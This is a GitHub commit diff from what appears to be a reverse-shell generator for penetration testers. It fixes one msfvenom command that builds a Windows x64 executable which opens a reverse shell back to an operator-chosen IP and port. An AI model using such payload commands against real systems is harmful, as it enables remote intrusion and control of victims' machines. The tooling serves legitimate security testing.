Merge pull request #79 from FreeZeroDays/main

Fixing "Windows Staged Reverse TCP (x64)"
This commit is contained in:
Ryan Montgomery 2022-02-11 23:40:59 -05:00 committed by GitHub
commit 4a13743a78
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -350,7 +350,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "Windows Staged Reverse TCP (x64)",
"command": "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
},
{